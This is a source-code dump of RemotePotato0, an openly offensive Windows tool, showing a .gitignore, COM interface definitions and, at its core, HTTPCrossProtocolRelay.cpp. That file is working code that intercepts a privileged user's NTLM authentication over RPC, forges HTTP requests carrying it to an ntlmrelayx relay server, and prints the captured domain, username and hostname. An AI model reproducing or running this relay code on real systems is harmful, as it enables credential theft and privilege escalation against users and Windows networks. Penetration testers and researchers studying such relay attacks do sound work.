├── .gitignore
├── HTTPCrossProtocolRelay.cpp
├── HTTPCrossProtocolRelay.h
├── IStandardActivator.idl
├── IStandardActivator_h.h
├── IStorageTrigger.cpp
├── IStorageTrigger.h
├── LICENSE
├── README.md
├── RPCCaptureServer.cpp
├── RPCCaptureServer.h
├── RelayLib.cpp
├── RelayLib.h
├── RemotePotato0.cpp
├── RemotePotato0.sln
├── RemotePotato0.vcxproj
├── RemotePotato0.vcxproj.filters
├── RogueOxidResolver.cpp
├── RogueOxidResolver.h
├── RogueOxidResolver.idl
├── RogueOxidResolver_c.c
├── RogueOxidResolver_h.h
├── RogueOxidResolver_s.c
├── demo_cross_session.gif
├── demo_hash_stealer.gif
└── network_capture_pcap
    ├── README.md
    ├── domain_controller.pcapng
    └── victim_server.pcapng

/.gitignore:
--------------------------------------------------------------------------------
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
##
## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore

# User-specific files
*.rsuser
*.suo
*.user
*.userosscache
*.sln.docstates

# User-specific files (MonoDevelop/Xamarin Studio)
*.userprefs

# Mono auto generated files
mono_crash.*

# Build results
[Dd]ebug/
[Dd]ebugPublic/
[Rr]elease/
[Rr]eleases/
x64/
x86/
[Aa][Rr][Mm]/
[Aa][Rr][Mm]64/
bld/
[Bb]in/
[Oo]bj/
[Ll]og/
[Ll]ogs/

# Visual Studio 2015/2017 cache/options directory
.vs/
# Uncomment if you have tasks that create the project's static files in wwwroot
#wwwroot/

# Visual Studio 2017 auto generated files
Generated\ Files/

# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*

# NUnit
*.VisualState.xml
TestResult.xml
nunit-*.xml

# Build Results of an ATL Project
[Dd]ebugPS/
[Rr]eleasePS/
dlldata.c

# Benchmark Results
BenchmarkDotNet.Artifacts/

# .NET Core
project.lock.json
project.fragment.lock.json
artifacts/

# StyleCop
StyleCopReport.xml

# Files built by Visual Studio
*_i.c
*_p.c
*_h.h
*.ilk
*.meta
*.obj
*.iobj
*.pch
*.pdb
*.ipdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*_wpftmp.csproj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.svclog
*.scc

# Chutzpah Test files
_Chutzpah*

# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opendb
*.opensdf
*.sdf
*.cachefile
*.VC.db
*.VC.VC.opendb

# Visual Studio profiler
*.psess
*.vsp
*.vspx
*.sap

# Visual Studio Trace Files
*.e2e

# TFS 2012 Local Workspace
$tf/

# Guidance Automation Toolkit
*.gpState

# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
*.DotSettings.user

# TeamCity is a build add-in
_TeamCity*

# DotCover is a Code Coverage Tool
*.dotCover

# AxoCover is a Code Coverage Tool
.axoCover/*
!.axoCover/settings.json

# Visual Studio code coverage results
*.coverage
*.coveragexml

# NCrunch
_NCrunch_*
.*crunch*.local.xml
nCrunchTemp_*

# MightyMoose
*.mm.*
AutoTest.Net/

# Web workbench (sass)
.sass-cache/

# Installshield output folder
[Ee]xpress/

# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html

# Click-Once directory
publish/

# Publish Web Output
*.[Pp]ublish.xml
*.azurePubxml
# Note: Comment the next line if you want to checkin your web deploy settings,
# but database connection strings (with potential passwords) will be unencrypted
*.pubxml
*.publishproj

# Microsoft Azure Web App publish settings. Comment the next line if you want to
# checkin your Azure Web App publish settings, but sensitive information contained
# in these scripts will be unencrypted
PublishScripts/

# NuGet Packages
*.nupkg
# NuGet Symbol Packages
*.snupkg
# The packages folder can be ignored because of Package Restore
**/[Pp]ackages/*
# except build/, which is used as an MSBuild target.
!**/[Pp]ackages/build/
# Uncomment if necessary however generally it will be regenerated when needed
#!**/[Pp]ackages/repositories.config
# NuGet v3's project.json files produces more ignorable files
*.nuget.props
*.nuget.targets

# Microsoft Azure Build Output
csx/
*.build.csdef

# Microsoft Azure Emulator
ecf/
rcf/

# Windows Store app package directories and files
AppPackages/
BundleArtifacts/
Package.StoreAssociation.xml
_pkginfo.txt
*.appx
*.appxbundle
*.appxupload

# Visual Studio cache files
# files ending in .cache can be ignored
*.[Cc]ache
# but keep track of directories ending in .cache
!?*.[Cc]ache/

# Others
ClientBin/
~$*
*~
*.dbmdl
*.dbproj.schemaview
*.jfm
*.pfx
*.publishsettings
orleans.codegen.cs

# Including strong name files can present a security risk
# (https://github.com/github/gitignore/pull/2483#issue-259490424)
#*.snk

# Since there are multiple workflows, uncomment next line to ignore bower_components
# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
#bower_components/

# RIA/Silverlight projects
Generated_Code/

# Backup & report files from converting an old project file
# to a newer Visual Studio version. Backup files are not needed,
# because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
ServiceFabricBackup/
*.rptproj.bak

# SQL Server files
*.mdf
*.ldf
*.ndf

# Business Intelligence projects
*.rdl.data
*.bim.layout
*.bim_*.settings
*.rptproj.rsuser
*- [Bb]ackup.rdl
*- [Bb]ackup ([0-9]).rdl
*- [Bb]ackup ([0-9][0-9]).rdl

# Microsoft Fakes
FakesAssemblies/

# GhostDoc plugin setting file
*.GhostDoc.xml

# Node.js Tools for Visual Studio
.ntvs_analysis.dat
node_modules/

# Visual Studio 6 build log
*.plg

# Visual Studio 6 workspace options file
*.opt

# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
*.vbw

# Visual Studio LightSwitch build output
**/*.HTMLClient/GeneratedArtifacts
**/*.DesktopClient/GeneratedArtifacts
**/*.DesktopClient/ModelManifest.xml
**/*.Server/GeneratedArtifacts
**/*.Server/ModelManifest.xml
_Pvt_Extensions

# Paket dependency manager
.paket/paket.exe
paket-files/

# FAKE - F# Make
.fake/

# CodeRush personal settings
.cr/personal

# Python Tools for Visual Studio (PTVS)
__pycache__/
*.pyc

# Cake - Uncomment if you are using it
# tools/**
# !tools/packages.config

# Tabs Studio
*.tss

# Telerik's JustMock configuration file
*.jmconfig

# BizTalk build output
*.btp.cs
*.btm.cs
*.odx.cs
*.xsd.cs

# OpenCover UI analysis results
OpenCover/

# Azure Stream Analytics local run output
ASALocalRun/

# MSBuild Binary and Structured Log
*.binlog

# NVidia Nsight GPU debugger configuration file
*.nvuser

# MFractors (Xamarin productivity tool) working folder
.mfractor/

# Local History for Visual Studio
.localhistory/

# BeatPulse healthcheck temp database
healthchecksdb

# Backup folder for Package Reference Convert tool in Visual Studio 2017
MigrationBackup/

# Ionide (cross platform F# VS Code tools) working folder
.ionide/

--------------------------------------------------------------------------------
/HTTPCrossProtocolRelay.cpp:
--------------------------------------------------------------------------------
#define WIN32_LEAN_AND_MEAN

#include "Windows.h"
#include "stdio.h"
#include <winsock2.h>   // socket(), connect(), send(), recv(), WSAStartup()
#include <ws2tcpip.h>   // TCP/IP address helpers
#include <stdlib.h>     // wcstombs(), atoi()
#include <wincrypt.h>   // CryptBinaryToStringA(), CryptStringToBinaryA()
#include "HTTPCrossProtocolRelay.h"
#include "RelayLib.h"

#pragma comment (lib, "Ws2_32.lib")
#pragma comment (lib, "Crypt32.lib")

#pragma warning(disable : 4996) //_CRT_SECURE_NO_WARNINGS

#define DEFAULT_BUFLEN 8192

extern BOOL g_SuccessTrigger;

void DoHTTPCrossProtocolRelay(wchar_t* remoteIpRelay, wchar_t* remotePortRelay, wchar_t* rpcServerIp, wchar_t* rpcServerPort, wchar_t* rpcRelayServerListeningPort)
{
    int iResult = 0;
    int recvbuflen = DEFAULT_BUFLEN;
    int sendbuflen = DEFAULT_BUFLEN;
    int ntlmIndex = 0;
    BOOL conn_flag = FALSE;
    char sendbuf[DEFAULT_BUFLEN];
    char recvbuf[DEFAULT_BUFLEN];
    char ntlmType1[DEFAULT_BUFLEN];
    char ntlmType2[DEFAULT_BUFLEN];
    int ntlmType2Len = 0;
    char ntlmType3[DEFAULT_BUFLEN];
    int ntlmType3Len = 0;

    char* httpPacketType1;
    int httpPacketType1Len;
    char* httpPacketType3;
    int httpPacketType3Len;

    char type1BakBuffer[DEFAULT_BUFLEN];
    int type1BakLen = 0;

    SOCKET RPCSocketListen = CreateRPCSocketListen(rpcRelayServerListeningPort);
    SOCKET RPCSocketReflect = NULL;
    SOCKET HTTPSocket = CreateHTTPSocket(remoteIpRelay, remotePortRelay);

    do {
        iResult = recv(RPCSocketListen, recvbuf, recvbuflen, 0);
        if (!conn_flag) {
            RPCSocketReflect = CreateRPCSocketReflect(rpcServerIp, rpcServerPort);
            conn_flag = TRUE;
        }
        ntlmIndex = findNTLMBytes(recvbuf, iResult);
        // if the rpc packet contains ntlm auth information we do our magic (cross protocol relay)
        if (ntlmIndex > 0) {
            // save the rpc packet of type1 authentication to forward it later to the fake RPC server (we reuse the RogueOxidResolver)
            memcpy(type1BakBuffer, recvbuf, iResult);
            type1BakLen = iResult;
            // copy in ntlmType1 the extracted auth information from the received buffer
            memcpy(ntlmType1, recvbuf + ntlmIndex, iResult - ntlmIndex);
            // forge the http packet with the type 1 auth and send it to the http server
            httpPacketType1 = ForgeHTTPRequestType1(ntlmType1, iResult - ntlmIndex, &httpPacketType1Len, remoteIpRelay);
            if (send(HTTPSocket, httpPacketType1, httpPacketType1Len, 0) == SOCKET_ERROR) {
                printf("[!] Couldn't forge the http packet with the type 1 auth and send it to the http server.\n");
                break;
            }
            Sleep(1000);
            // receive the http response from the http server including type2 message
            iResult = recv(HTTPSocket, recvbuf, recvbuflen, 0);
            if (iResult == SOCKET_ERROR) {
                printf("[!] Couldn't receive the http response from the http server\n");
                break;
            }
            // extract from the http packet the type2 ntlm message
            ExtractType2FromHttp(recvbuf, iResult, ntlmType2, &ntlmType2Len);
            // here we communicate with our fake RPC Server to have just the template for rpc packets, sending the type1
            if (send(RPCSocketReflect, type1BakBuffer, type1BakLen, 0) == SOCKET_ERROR) {
                printf("[!] Couldn't communicate with the fake RPC Server\n");
                break;
            }
            // receiving the type2 message from the fake RPC Server to use as a template for our relayed auth
            iResult = recv(RPCSocketReflect, recvbuf, recvbuflen, 0);
            if (iResult == SOCKET_ERROR) {
                printf("[!] Couldn't receive the type2 message from the fake RPC Server\n");
                break;
            }
            // get the ntlmindex from the type2 message received from the fake rpc server
            ntlmIndex = findNTLMBytes(recvbuf, iResult);
            // in this function we take the packet template from a real rpc server and we alter the authentication part,
            // in this case we change the original type2 with the type2 received by the http server. We also adjust the len of the rpc packet fragLen and authLen
            // to not break the rpc protocol
            ForgeAndAlterType2Rpc(recvbuf, iResult, ntlmIndex, ntlmType2, ntlmType2Len, sendbuf);
            // send the altered type2 to the rpc client (the privileged auth)
            if (send(RPCSocketListen, sendbuf, ntlmIndex + ntlmType2Len, 0) == SOCKET_ERROR) {
                printf("[!] Couldn't send the altered type2 to the rpc client (the privileged auth)\n");
                break;
            }
            // receive the type3 auth from the rpc client. This is the privileged AUTH that the client is sending us
            iResult = recv(RPCSocketListen, recvbuf, recvbuflen, 0);
            if (iResult == SOCKET_ERROR) {
                printf("[!] Couldn't receive the type3 auth from the rpc client\n");
                break;
            }
            // extract the type3 auth from the rpc packet
            ExtractType3FromRpc(recvbuf, iResult, ntlmType3, &ntlmType3Len);
            // forge the http packet containing the type3 AUTH
            httpPacketType3 = ForgeHTTPRequestType3(ntlmType3, ntlmType3Len, &httpPacketType3Len, remoteIpRelay);
            // send the type3 AUTH to the http server, cross the finger :D
            if (send(HTTPSocket, httpPacketType3, httpPacketType3Len, 0) == SOCKET_ERROR) {
                printf("[!] Couldn't send the type3 AUTH to the http server\n");
                break;
            }
            ParseUsernameFromType3(ntlmType3, ntlmType3Len);
            // receive the output from the http server. If using ntlmrelayx a 404 response means a successful relay.
            iResult = recv(HTTPSocket, recvbuf, recvbuflen, 0);
            if (iResult == SOCKET_ERROR) {
                printf("[!] Couldn't receive the output from the http server\n");
                break;
            }
            if (recvbuf[9] == '4' && recvbuf[10] == '0' && recvbuf[11] == '4')
                printf("[+] Relaying seems successfull, check ntlmrelayx output!\n");
            else
                printf("[!] Relaying failed :(\n");
            break;
        }
    } while (iResult > 0);
    closesocket(RPCSocketListen);
    closesocket(RPCSocketReflect);
    closesocket(HTTPSocket);
    WSACleanup();
}


SOCKET CreateHTTPSocket(const wchar_t* remoteHTTPIp, const wchar_t* remoteHttpPort) {
    //----------------------
    // Initialize Winsock

    char remoteHTTPIp_a[20];
    char remotePort_a[12];
    int remotePort;
    WSADATA wsaData;
    int iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
    if (iResult != NO_ERROR) {
        wprintf(L"WSAStartup function failed with error: %d\n", iResult);
        return 1;
    }
    //----------------------
    // Create a SOCKET for connecting to server
    SOCKET ConnectSocket;
    ConnectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (ConnectSocket == INVALID_SOCKET) {
        wprintf(L"socket function failed with error: %ld\n", WSAGetLastError());
        WSACleanup();
        return 1;
    }
    //----------------------
    // The sockaddr_in structure specifies the address family,
    // IP address, and port of the server to be connected to.

    memset(remotePort_a, 0, 12);
    wcstombs(remotePort_a, remoteHttpPort, 12);
    memset(remoteHTTPIp_a, 0, 20);
    wcstombs(remoteHTTPIp_a, remoteHTTPIp, 20);
    remotePort = atoi(remotePort_a);
    sockaddr_in clientService;
    clientService.sin_family = AF_INET;
    clientService.sin_addr.s_addr = inet_addr(remoteHTTPIp_a);
    clientService.sin_port = htons(remotePort);

    //----------------------
    // Connect to server.
    iResult = connect(ConnectSocket, (SOCKADDR*)& clientService, sizeof(clientService));
    if (iResult == SOCKET_ERROR) {
        wprintf(L"CreateHTTPSocket: connect function failed with error: %ld\n", WSAGetLastError());
        iResult = closesocket(ConnectSocket);
        if (iResult == SOCKET_ERROR)
            wprintf(L"closesocket function failed with error: %ld\n", WSAGetLastError());
        WSACleanup();
        return 1;
    }

    printf("[*] Connected to ntlmrelayx HTTP Server %S on port %S\n", remoteHTTPIp, remoteHttpPort);
    return ConnectSocket;
}

char* ForgeHTTPRequestType1(char* ntlmsspType1, int ntlmsspType1Len, int* httpPacketType1Len, wchar_t* httpIp) {
    char httpPacketTemplate[] = "GET / HTTP/1.1\r\nHost: %s\r\nAuthorization: NTLM %s\r\n\r\n";
    char* httpPacket = (char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, DEFAULT_BUFLEN);
    int b64ntlmLen;
    char httpIp_a[20];
    memset(httpIp_a, 0, 20);
    wcstombs(httpIp_a, httpIp, 20);
    char* b64ntlmTmp = base64Encode(ntlmsspType1, ntlmsspType1Len, &b64ntlmLen);
    char b64ntlm[DEFAULT_BUFLEN];
    memset(b64ntlm, 0, DEFAULT_BUFLEN);
    memcpy(b64ntlm, b64ntlmTmp, b64ntlmLen);
    *httpPacketType1Len = sprintf(httpPacket, httpPacketTemplate, httpIp_a, b64ntlm);
    return httpPacket;
}

char* ForgeHTTPRequestType3(char* ntlmsspType3, int ntlmsspType3Len, int* httpPacketType3Len, wchar_t* httpIp) {
    char httpPacketTemplate[] = "GET / HTTP/1.1\r\nHost: %s\r\nAuthorization: NTLM %s\r\n\r\n";
    char* httpPacket = (char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, DEFAULT_BUFLEN);
    int b64ntlmLen;
    char httpIp_a[20];
    memset(httpIp_a, 0, 20);
    wcstombs(httpIp_a, httpIp, 20);
    char* b64ntlmTmp = base64Encode(ntlmsspType3, ntlmsspType3Len, &b64ntlmLen);
    char b64ntlm[DEFAULT_BUFLEN];
    memset(b64ntlm, 0, DEFAULT_BUFLEN);
    memcpy(b64ntlm, b64ntlmTmp, b64ntlmLen);
    *httpPacketType3Len = sprintf(httpPacket, httpPacketTemplate, httpIp_a, b64ntlm);
    return httpPacket;
}

void ExtractType2FromHttp(char* httpPacket, int httpPacketLen, char* ntlmType2, int* ntlmType2Len) {
    char b64Type2[DEFAULT_BUFLEN];
    int b64Type2Len = 0;
    findBase64NTLM(httpPacket, httpPacketLen, b64Type2, &b64Type2Len);
    char* decodedType2Tmp = base64Decode(b64Type2, b64Type2Len, ntlmType2Len);
    memset(ntlmType2, 0, DEFAULT_BUFLEN);
    memcpy(ntlmType2, decodedType2Tmp, *ntlmType2Len);
}

void ParseUsernameFromType3(char* ntlmType3, int ntlmType3Len) {
    short* domainLen, * userLen, * hostnameLen;
    __int32* domainOffset, * userOffset, * hostnameOffset;
    wchar_t domain[32], user[32], hostname[32];
    domainLen = (short*)(ntlmType3 + 28);
    userLen = (short*)(ntlmType3 + 36);
    hostnameLen = (short*)(ntlmType3 + 44);
    domainOffset = (__int32*)(ntlmType3 + 32);
    userOffset = (__int32*)(ntlmType3 + 40);
    hostnameOffset = (__int32*)(ntlmType3 + 48);
    memset(domain, 0, 32);
    memcpy(domain, ntlmType3 + (*domainOffset), *domainLen);
    memset(user, 0, 32);
    memcpy(user, ntlmType3 + (*userOffset), *userLen);
    memset(hostname, 0, 32);
    memcpy(hostname, ntlmType3 + (*hostnameOffset), *hostnameLen);
    printf("[+] Got NTLM type 3 AUTH message from %S\\%S with hostname %S \n", domain, user, hostname);
    g_SuccessTrigger = TRUE;
}

int findBase64NTLM(char* buffer, int buffer_len, char* outbuffer, int* outbuffer_len) {
    char pattern_head[] = { 'N', 'T', 'L', 'M', ' ' };
    char pattern_tail[2] = { 0x0D, 0x0A }; // \r\n
    int index_start = 0;
    for (int i = 0; i < buffer_len; i++) {
    }
    for (int i = 0; i < buffer_len; i++) {
        if (buffer[i] == pattern_head[index_start]) {
            index_start = index_start + 1;
            if (index_start == sizeof(pattern_head)) {
                index_start = i + 1;
                break;
            }
        }
    }
    *outbuffer_len = 0;
    for (int i = index_start; i < buffer_len; i++) {
        if (buffer[i] == pattern_tail[0] && buffer[i + 1] == pattern_tail[1]) {
            break;
        }
        outbuffer[(*outbuffer_len)] = buffer[i];
        *outbuffer_len = (*outbuffer_len) + 1;
    }
    //printf("*outbuffer_len: %d and index_start: %d", *outbuffer_len,index_start);
    //hexDump2(NULL, outbuffer, *outbuffer_len);
    return 0;
}

char* base64Encode(char* text, int textLen, int* b64Len) {
    *b64Len = DEFAULT_BUFLEN;
    char* b64Text = (char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, *b64Len);
    if (!CryptBinaryToStringA((const BYTE*)text, textLen, CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, b64Text, (DWORD*)b64Len)) {
        printf("CryptBinaryToStringA failed with error code %d", GetLastError());
        HeapFree(GetProcessHeap(), 0, b64Text);
        b64Text = NULL;
        exit(-1);
    }
    return b64Text;
}

char* base64Decode(char* b64Text, int b64TextLen, int* bufferLen) {
    *bufferLen = DEFAULT_BUFLEN;
    char* buffer = (char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, *bufferLen);
    if (!CryptStringToBinaryA((LPCSTR)b64Text, b64TextLen, CRYPT_STRING_BASE64, (BYTE*)buffer, (DWORD*)bufferLen, NULL, NULL)) {
        printf("CryptStringToBinaryA failed with error code %d", GetLastError());
        HeapFree(GetProcessHeap(), 0, buffer);
        buffer = NULL;
        exit(-1);
    }
    return buffer;
}

--------------------------------------------------------------------------------
/HTTPCrossProtocolRelay.h:
--------------------------------------------------------------------------------
#pragma once
#include "Windows.h"

void DoHTTPCrossProtocolRelay(wchar_t*, wchar_t*, wchar_t*, wchar_t*, wchar_t*);
SOCKET CreateHTTPSocket(const wchar_t*, const wchar_t*);
char* ForgeHTTPRequestType1(char*, int, int*, wchar_t*);
char* ForgeHTTPRequestType3(char*, int, int*, wchar_t*);
void ExtractType2FromHttp(char*, int, char*, int*);
void ParseUsernameFromType3(char*, int);
int findBase64NTLM(char*, int, char*, int*);
char* base64Encode(char*, int, int*);
char* base64Decode(char*, int, int*);
--------------------------------------------------------------------------------
/IStandardActivator.idl:
--------------------------------------------------------------------------------
import "oaidl.idl";
import "ocidl.idl";

[
    object,
    local,
    uuid(000001b8-0000-0000-C000-000000000046),
    pointer_default(unique)
]
interface IStandardActivator : IUnknown
{
    HRESULT StandardGetClassObject([in] REFCLSID rclsid,
        [in] DWORD dwClsCtx,
        [in] COSERVERINFO* pServerInfo,
        [in] REFIID riid,
        [out, iid_is(riid)] void** ppv);

    HRESULT StandardCreateInstance([in] REFCLSID Clsid,
        [in] IUnknown* punkOuter,
        [in] DWORD dwClsCtx,
        [in] COSERVERINFO* pServerInfo,
        [in] DWORD dwCount,
        [in, size_is(dwCount)] MULTI_QI* pResults);

    HRESULT StandardGetInstanceFromFile(
        [in] COSERVERINFO* pServerInfo,
        [in] CLSID* pclsidOverride,
        [in] IUnknown* punkOuter,
        [in] DWORD dwClsCtx,
        [in] DWORD grfMode,
        [in] OLECHAR* pwszName,
        [in] DWORD dwCount,
        [in, size_is(dwCount)] MULTI_QI* pResults);

    HRESULT StandardGetInstanceFromIStorage(
        [in] COSERVERINFO* pServerInfo,
        [in] CLSID* pclsidOverride,
        [in] IUnknown* punkOuter,
        [in] DWORD dwClsCtx,
        [in] IStorage* pstg,
        [in] DWORD dwCount,
        [in, size_is(dwCount)] MULTI_QI* pResults);

    HRESULT Reset();
}

[
    object,
    local,
    uuid(000001b9-0000-0000-C000-000000000046),
    pointer_default(unique)
]
interface ISpecialSystemProperties : IUnknown
{
    HRESULT SetSessionId([in] ULONG dwSessionId, [in]BOOL bUseConsole, [in] BOOL fRemoteThisSessionId);
    HRESULT GetSessionId([out] ULONG* pdwSessionId, [out]BOOL* pbUseConsole);
    HRESULT GetSessionId2([out] ULONG* pdwSessionId, [out]BOOL* pbUseConsole, [out] BOOL* pfRemoteThisSessionId);
    HRESULT SetClientImpersonating([in]BOOL fClientImpersonating);
    HRESULT GetClientImpersonating([out]BOOL* pfClientImpersonating);
    HRESULT SetPartitionId([in] REFGUID guidPartiton);
    HRESULT GetPartitionId([out] GUID* pguidPartiton);
    HRESULT SetProcessRequestType([in] DWORD dwPRT);
    HRESULT GetProcessRequestType([out] DWORD* pdwPRT);
    HRESULT SetOrigClsctx([in] DWORD dwClsctx);
    HRESULT GetOrigClsctx([out] DWORD* dwClsctx);
    HRESULT GetDefaultAuthenticationLevel([out] DWORD* pdwAuthnLevel);
    HRESULT SetDefaultAuthenticationLevel([in] DWORD dwAuthnLevel);
}

--------------------------------------------------------------------------------
/IStandardActivator_h.h:
--------------------------------------------------------------------------------


/* this ALWAYS GENERATED file contains the definitions for the interfaces */


 /* File created by MIDL compiler version 8.01.0622 */
/* at Tue Jan 19 04:14:07 2038
 */
/* Compiler settings for IStandardActivator.idl:
    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622
    protocol : all , ms_ext, c_ext, robust
    error checks: allocation ref bounds_check enum stub_data
    VC __declspec() decoration level:
         __declspec(uuid()), __declspec(selectany), __declspec(novtable)
         DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING( ) */



/* verify that the version is high enough to compile this file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 500
#endif

#include "rpc.h"
#include "rpcndr.h"

#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of <rpcndr.h>
#endif /* __RPCNDR_H_VERSION__
 */

#ifndef COM_NO_WINDOWS_H
#include "windows.h"
#include "ole2.h"
#endif /*COM_NO_WINDOWS_H*/

#ifndef __IStandardActivator_h_h__
#define __IStandardActivator_h_h__

#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif

/* Forward Declarations */

#ifndef __IStandardActivator_FWD_DEFINED__
#define __IStandardActivator_FWD_DEFINED__
typedef interface IStandardActivator IStandardActivator;

#endif /* __IStandardActivator_FWD_DEFINED__ */


#ifndef __ISpecialSystemProperties_FWD_DEFINED__
#define __ISpecialSystemProperties_FWD_DEFINED__
typedef interface ISpecialSystemProperties ISpecialSystemProperties;

#endif /* __ISpecialSystemProperties_FWD_DEFINED__ */


/* header files for imported files */
#include "oaidl.h"
#include "ocidl.h"

#ifdef __cplusplus
extern "C"{
#endif


#ifndef __IStandardActivator_INTERFACE_DEFINED__
#define __IStandardActivator_INTERFACE_DEFINED__

/* interface IStandardActivator */
/* [unique][uuid][local][object] */


EXTERN_C const IID IID_IStandardActivator;

#if defined(__cplusplus) && !defined(CINTERFACE)

    MIDL_INTERFACE("000001b8-0000-0000-C000-000000000046")
    IStandardActivator : public IUnknown
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE StandardGetClassObject(
            /* [in] */ REFCLSID rclsid,
            /* [in] */ DWORD dwClsCtx,
            /* [in] */ COSERVERINFO *pServerInfo,
            /* [in] */ REFIID riid,
            /* [iid_is][out] */ void **ppv) = 0;

        virtual HRESULT STDMETHODCALLTYPE StandardCreateInstance(
            /* [in] */ REFCLSID Clsid,
            /* [in] */ IUnknown *punkOuter,
            /* [in] */ DWORD dwClsCtx,
            /* [in] */ COSERVERINFO *pServerInfo,
            /* [in] */ DWORD dwCount,
            /* [size_is][in] */ MULTI_QI *pResults) = 0;

        virtual HRESULT STDMETHODCALLTYPE StandardGetInstanceFromFile(
            /* [in] */ COSERVERINFO *pServerInfo,
            /* [in] */ CLSID *pclsidOverride,
            /* [in] */ IUnknown *punkOuter,
            /* [in] */ DWORD dwClsCtx,
            /* [in] */ DWORD grfMode,
            /* [in] */ OLECHAR *pwszName,
            /* [in] */ DWORD dwCount,
            /* [size_is][in] */ MULTI_QI *pResults) = 0;

        virtual HRESULT STDMETHODCALLTYPE StandardGetInstanceFromIStorage(
            /* [in] */ COSERVERINFO *pServerInfo,
            /* [in] */ CLSID *pclsidOverride,
            /* [in] */ IUnknown *punkOuter,
            /* [in] */ DWORD dwClsCtx,
            /* [in] */ IStorage *pstg,
            /* [in] */ DWORD dwCount,
            /* [size_is][in] */ MULTI_QI *pResults) = 0;

        virtual HRESULT STDMETHODCALLTYPE Reset( void) = 0;

    };


#else /* C style interface */

    typedef struct IStandardActivatorVtbl
    {
        BEGIN_INTERFACE

        HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
            IStandardActivator * This,
            /* [in] */ REFIID riid,
            /* [annotation][iid_is][out] */
            _COM_Outptr_ void **ppvObject);

        ULONG ( STDMETHODCALLTYPE *AddRef )(
            IStandardActivator * This);

        ULONG ( STDMETHODCALLTYPE *Release )(
            IStandardActivator * This);

        HRESULT ( STDMETHODCALLTYPE *StandardGetClassObject )(
            IStandardActivator * This,
            /* [in] */ REFCLSID rclsid,
            /* [in] */ DWORD dwClsCtx,
            /* [in] */ COSERVERINFO *pServerInfo,
            /* [in] */ REFIID riid,
            /* [iid_is][out] */ void **ppv);

        HRESULT ( STDMETHODCALLTYPE *StandardCreateInstance )(
            IStandardActivator * This,
            /* [in] */ REFCLSID Clsid,
            /* [in] */ IUnknown *punkOuter,
            /* [in] */ DWORD dwClsCtx,
            /* [in] */ COSERVERINFO *pServerInfo,
            /* [in] */ DWORD dwCount,
            /* [size_is][in] */ MULTI_QI *pResults);

        HRESULT ( STDMETHODCALLTYPE *StandardGetInstanceFromFile )(
            IStandardActivator * This,
            /* [in] */ COSERVERINFO *pServerInfo,
            /* [in] */ CLSID *pclsidOverride,
            /* [in] */ IUnknown *punkOuter,
            /* [in] */ DWORD dwClsCtx,
            /* [in] */ DWORD grfMode,
            /* [in] */ OLECHAR *pwszName,
            /* [in] */ DWORD dwCount,
            /* [size_is][in] */ MULTI_QI *pResults);

        HRESULT ( STDMETHODCALLTYPE *StandardGetInstanceFromIStorage )(
            IStandardActivator * This,
            /* [in] */ COSERVERINFO *pServerInfo,
            /* [in] */ CLSID *pclsidOverride,
            /* [in] */ IUnknown *punkOuter,
            /* [in] */ DWORD dwClsCtx,
            /* [in] */ IStorage *pstg,
            /* [in] */ DWORD dwCount,
            /* [size_is][in] */ MULTI_QI *pResults);

        HRESULT ( STDMETHODCALLTYPE *Reset )(
            IStandardActivator * This);

        END_INTERFACE
    } IStandardActivatorVtbl;

    interface IStandardActivator
    {
        CONST_VTBL struct IStandardActivatorVtbl *lpVtbl;
    };



#ifdef COBJMACROS


#define IStandardActivator_QueryInterface(This,riid,ppvObject) \
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) )

#define IStandardActivator_AddRef(This) \
    ( (This)->lpVtbl -> AddRef(This) )

#define IStandardActivator_Release(This) \
    ( (This)->lpVtbl -> Release(This) )


#define IStandardActivator_StandardGetClassObject(This,rclsid,dwClsCtx,pServerInfo,riid,ppv) \
    ( (This)->lpVtbl -> StandardGetClassObject(This,rclsid,dwClsCtx,pServerInfo,riid,ppv) )

#define IStandardActivator_StandardCreateInstance(This,Clsid,punkOuter,dwClsCtx,pServerInfo,dwCount,pResults) \
    ( (This)->lpVtbl -> StandardCreateInstance(This,Clsid,punkOuter,dwClsCtx,pServerInfo,dwCount,pResults) )

#define IStandardActivator_StandardGetInstanceFromFile(This,pServerInfo,pclsidOverride,punkOuter,dwClsCtx,grfMode,pwszName,dwCount,pResults) \
    ( (This)->lpVtbl -> StandardGetInstanceFromFile(This,pServerInfo,pclsidOverride,punkOuter,dwClsCtx,grfMode,pwszName,dwCount,pResults) )

#define IStandardActivator_StandardGetInstanceFromIStorage(This,pServerInfo,pclsidOverride,punkOuter,dwClsCtx,pstg,dwCount,pResults) \
    ( (This)->lpVtbl -> StandardGetInstanceFromIStorage(This,pServerInfo,pclsidOverride,punkOuter,dwClsCtx,pstg,dwCount,pResults) )

#define IStandardActivator_Reset(This) \
